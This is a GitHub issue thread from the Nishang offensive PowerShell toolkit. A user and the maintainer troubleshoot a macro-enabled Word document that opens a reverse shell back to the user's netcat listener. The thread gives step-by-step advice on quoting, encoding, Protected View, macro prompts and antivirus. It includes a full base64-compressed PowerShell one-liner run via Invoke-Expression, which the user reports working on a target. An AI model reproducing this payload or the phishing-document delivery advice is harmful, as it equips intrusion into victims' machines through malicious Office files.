### ISSUE TITLE
Problems with Invoke-PowerShellTcpOneLine.ps1

### ISSUE THREAD

**Issue by jackd91** [samratashok/nishang#62]
Hi,

Been trying the below and can't seem to get it to work. Please can you advise. Thanks

![image](https://user-images.githubusercontent.com/36299820/36028056-816c3bae-0d95-11e8-9283-ffaf72bd2dc7.png)

**Comment by samratashok** [comment]
Please use double quotes to enclose the script block as the script block contains single quotes. 
Invoke-Encode -DataToEncode "" -IsString -PostScriptCommand

**Comment by jackd91** [comment]
Thanks - can you let me know by the below isn't working? Can't get my head around why its not connecting back to my netcat listener.

![image](https://user-images.githubusercontent.com/36299820/36028731-010a2d4c-0d98-11e8-84d9-b9c55f9a1854.png)

**Comment by samratashok** [comment]
Uh sorry, I answered in a hurry. Using double quotes with Invoke-Encode evaluates the variables. Please use single quotes and escape those in the payload. 
![github_issue](https://user-images.githubusercontent.com/1753291/36030105-e3746804-0dcb-11e8-982d-9c117911079f.png)


Please keep in mind that it is always better to point Invoke-Encode to a script (save your payload in a script) to avoid escaping quotes manually.

**Comment by jackd91** [comment]
Thanks for your help. Still unable to get it working though even when using single quotes:

![image](https://user-images.githubusercontent.com/36299820/36030676-1297348a-0da0-11e8-9a94-53ac5536d47e.png)

Are there any other methods that I could use to create a Word document that'll callback to my netcat listener as this doesn't seem to be working?

Thanks.

**Comment by samratashok** [comment]
What do you see when you open the Word document? You have to click through Protected View and Macro warning. 

You may like to remove the screenshot with the Public IP? Just in case.

**Comment by jackd91** [comment]
I do click through the Protected View and Macro warning and just see:

Microsoft Word 2016
This document was edited in a different version of Microsoft Word.
To load the document, please Enable Content

**Comment by samratashok** [comment]
This should work fine then. It could also be your AV. 
Also, try the payload without Word document to see if it works. You may also like to try if you can establish TCP traffic between the target and listener. If not, try payloads which use other protocols.

**Comment by jackd91** [comment]
I have tried doing this on multiple hosts (some without AV) and it just doesn't seem to be working :(. Surely I must be doing something wrong? How do I go about testing the payload without the Word doc?

**Comment by samratashok** [comment]
Simply use the payload you are passing to Out-Word in cmd
C:\> powershell <contents of encodedcommand.txt>

**Comment by jackd91** [comment]
I have a netcat listening on port 4444 and when I run the below on the target machine it doesn't appear to be working. Just seems to be hanging. Any ideas?

C:> powershell Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('TZFda8IwFIbvB/sP56JbE2ZD203ZLBO2sg1hqKzCLsSL2B5sZq1iz1BR//uS1nbmJofwfjxJrDhTmBM8wwC3znD2gzFBtC8Il2KAJKJVvEAqxDgchaWS2d6TL7zOo/CE5/p260EvHlgFbVAudY5VJYoPpKg8YzyYzPaEk+nUMnuhRa4QnXb7vn28ObinYJuqDBmzlLFXQeILZcIqfQvcFlSj+MR8Tinn4OQILj8EViJJah+74HfG+zUO5BLrm4xxR+IlCvv9tzxeJSqf8zOfHusWU6LMTTBPZjJemFCFO6ga/N6tB0cY/pJT2eBC6kNJXhvvwB5FYOudrbcJFyNJqTnsgX326EITPyEDhmemabdbMpZsr4aJ/Tc0Tyy+N4qQNTmau5nr52m079lvkTJ+CupfCbNVgYxfX/0B')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

**Comment by jackd91** [comment]
Edit - I have now got it working with just testing the payload. Now I need to try to get it working with the Word doc too.

**Comment by jackd91** [comment]
Just a small update - I have finally got the payload to work within the Word document. However, it only appears to be working when I open the Word document on a single host - the others don't seem to work? Any ideas?

**Comment by samratashok** [comment]
What was the issue with the Word doc previously? Could be the same on other hosts as well.

**Comment by samratashok** [comment]
Closed due to no response.
